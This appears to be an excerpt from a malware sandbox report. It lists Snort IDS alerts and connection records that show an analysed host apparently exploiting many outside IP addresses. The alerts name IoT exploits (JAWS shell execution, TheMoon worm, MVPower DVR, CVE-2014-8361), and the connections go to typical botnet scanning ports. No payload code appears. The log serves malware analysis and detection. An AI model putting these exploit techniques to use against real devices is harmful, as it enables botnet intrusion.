| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35908 -> 51.75.211.214:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47104 -> 96.23.45.10:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57850 -> 119.46.201.226:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39206 -> 184.18.210.38:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59852 -> 87.117.246.145:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55418 -> 92.222.51.111:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48986 -> 46.18.124.174:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58292 -> 157.97.121.148:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56588 -> 34.96.117.9:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35724 -> 109.73.3.182:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:47664 -> 172.67.164.91:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39984 -> 161.71.20.251:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55738 -> 52.210.12.82:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48270 -> 176.106.241.227:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60296 -> 75.103.79.115:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55738 -> 52.210.12.82:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:34038 -> 172.107.197.33:8080 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48270 -> 176.106.241.227:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54368 -> 184.160.78.75:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42556 -> 98.183.185.136:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53628 -> 64.227.92.214:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60402 -> 172.93.139.241:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44516 -> 98.193.229.101:8080 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.178.102:80 -> 192.168.2.23:44228 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.82.50:80 -> 192.168.2.23:60532 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.164.164:80 -> 192.168.2.23:41214 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:38998 -> 172.242.11.63:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52336 -> 172.64.142.109:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57016 -> 172.64.194.235:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43060 -> 172.65.166.132:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56614 -> 172.65.163.255:8080 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49456 -> 52.215.153.199:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45398 -> 51.222.99.107:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:47144 -> 172.64.102.67:8080 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53580 -> 190.134.62.144:52869 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:50088 -> 190.134.234.102:52869 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43752 -> 23.57.63.77:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42456 -> 150.220.255.117:80 |
| Source: Traffic | Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35678 -> 210.209.85.254:52869 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41786 -> 2.44.82.52:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.57.63.77:80 -> 192.168.2.23:43752 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50858 -> 143.248.162.55:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42456 -> 150.220.255.117:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52510 -> 23.32.78.67:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41582 -> 136.0.114.189:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55922 -> 176.53.90.115:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57232 -> 62.78.39.31:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42802 -> 151.236.99.137:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.32.78.67:80 -> 192.168.2.23:52510 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41582 -> 136.0.114.189:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56108 -> 24.234.101.183:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50170 -> 172.65.244.190:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:45086 -> 172.67.251.195:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36696 -> 172.64.90.77:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:41834 -> 172.67.23.174:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:41256 -> 172.65.10.239:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33092 -> 172.65.176.133:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:51490 -> 172.65.40.238:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:40480 -> 172.65.162.19:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:49164 -> 172.67.34.249:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:40150 -> 172.241.30.240:8080 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.23.72:80 -> 192.168.2.23:59798 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.164.117:80 -> 192.168.2.23:42336 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55600 -> 14.34.108.224:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49204 -> 51.68.183.36:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58828 -> 52.232.245.128:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43670 -> 170.61.186.9:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59002 -> 54.209.62.58:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58552 -> 37.10.123.43:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47932 -> 95.217.212.105:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59468 -> 200.232.87.52:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41516 -> 74.206.176.230:80 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36162 -> 38.17.54.235:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42188 -> 23.14.19.165:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40432 -> 49.44.117.46:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33856 -> 45.232.57.92:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57444 -> 52.197.71.225:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46478 -> 203.174.75.233:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.14.19.165:80 -> 192.168.2.23:42188 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 49.44.117.46:80 -> 192.168.2.23:40432 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48126 -> 184.24.7.146:80 |
| Source: Traffic | Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39774 -> 23.223.65.37:80 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 184.24.7.146:80 -> 192.168.2.23:48126 |
| Source: Traffic | Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.223.65.37:80 -> 192.168.2.23:39774 |
| Source: Traffic | Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39774 -> 23.223.65.37:80 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:53980 -> 172.64.174.106:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57028 -> 172.65.147.80:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43442 -> 172.64.132.226:8080 |
| Source: Traffic | Snort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:59366 -> 172.64.97.172:8080 |
| Source: unknown | Network traffic detected: HTTP traffic on port 55010 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43816 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 51826 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43364 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58864 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58864 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 32790 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 48344 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36250 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47280 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 47280 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52682 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46594 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42262 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58864 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50780 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38924 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50780 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54936 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50780 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36872 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35782 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 49146 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58200 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58864 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54590 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50780 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54936 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52040 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57846 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37484 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36818 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50780 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54936 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53244 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60508 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46274 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60390 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50472 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46078 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52792 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54692 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 51798 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 52792 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40816 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42812 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58048 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52120 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58864 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60622 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54692 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 51798 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42812 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40816 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52120 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58048 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58854 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59688 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39350 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39960 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33920 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57464 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54692 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 51798 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42812 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40816 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52120 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58048 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57464 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50780 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39750 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40768 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 49880 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 55230 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57464 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54936 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58854 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45270 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34568 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52600 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57464 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35542 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39170 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 55346 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44646 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35812 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58478 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42276 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57464 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37215 -> 42276 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42934 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59278 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42380 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42080 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42934 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59278 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60348 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42080 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42934 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58864 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 38894 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 60668 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50986 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43098 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42080 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 55086 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50780 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59278 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52844 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59182 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 59182 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54936 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52750 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54910 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 49914 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40568 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 48910 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35954 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46276 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42934 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40568 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42080 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33088 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 51288 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54424 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41952 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33088 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40332 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 51166 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59278 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 46942 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36372 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33610 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33088 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59770 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57464 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33610 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40332 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54424 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54706 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41080 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 41080 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54556 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37980 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33610 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54706 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41952 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59770 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42934 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42080 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40332 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54706 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41554 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35106 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37368 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54556 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33610 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35106 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37980 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37215 -> 35106 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54424 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37368 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33318 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37844 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35480 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58140 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40384 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 55368 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44344 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 48776 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 58140 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54706 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59278 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37368 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37844 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59770 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54556 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56880 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37980 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54860 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37844 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37368 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44344 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41952 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40332 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33610 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 34480 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 40268 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53680 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 43882 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 39422 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50722 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54706 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33970 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45918 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54424 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37844 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56306 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44344 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37368 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54556 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35918 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47268 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 59770 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45918 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37980 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42080 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 47866 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 54948 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56058 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53836 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 42934 -> 5555 |
| Source: unknown | Network traffic detected: HTTP traffic on port 57486 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45300 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52154 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 53580 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 50088 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35678 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 52836 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 36752 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 44770 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 41764 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 51054 -> 1723 |
| Source: unknown | Network traffic detected: HTTP traffic on port 35678 -> 52869 |
| Source: unknown | Network traffic detected: HTTP traffic on port 56276 -> 8081 |
| Source: unknown | Network traffic detected: HTTP traffic on port 8081 -> 56276 |
| Source: unknown | Network traffic detected: HTTP traffic on port 33610 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 45918 -> 37215 |
| Source: unknown | Network traffic detected: HTTP traffic on port 37364 -> 37215 |
